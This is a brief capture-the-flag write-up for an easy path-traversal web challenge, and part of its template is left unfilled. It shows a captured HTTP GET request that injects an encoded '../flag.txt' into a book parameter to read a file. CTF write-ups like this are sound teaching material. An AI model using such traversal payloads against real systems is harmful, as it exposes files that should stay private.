1. Challenge Information

• Category: Web - Path traversal
• Difficulty: Easy

2. TL;DR Solution Summary

The book retrieval function is vulnerable to path traversal attack to retrieve flag.txt at the root folder

3. Recon / Initial Analysis

3.1 Files/ Informations Provided

• Describe file(s)
• Tools used to inspect (e.g., strings, Wireshark, CyberChef)
• Initial observations

4. Vulnerability Breakdown

• Path traversal can be exploited by using combinations of ../ to retrieve sensitive file

5. Exploitation

5.1 Method / Tools Used

• Burpsuite

5.2 Walkthrough

• Intercept the HTTP Get request, and inject ../flag.txt

GET /library/?book=%2e%2e%2fflag.txt HTTP/1.1
Host: curtinctfmy-adventures-of-harald1.chals.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Pwnfox-Color: cyan
Priority: u=0, i
Te: trailers
Connection: keep-alive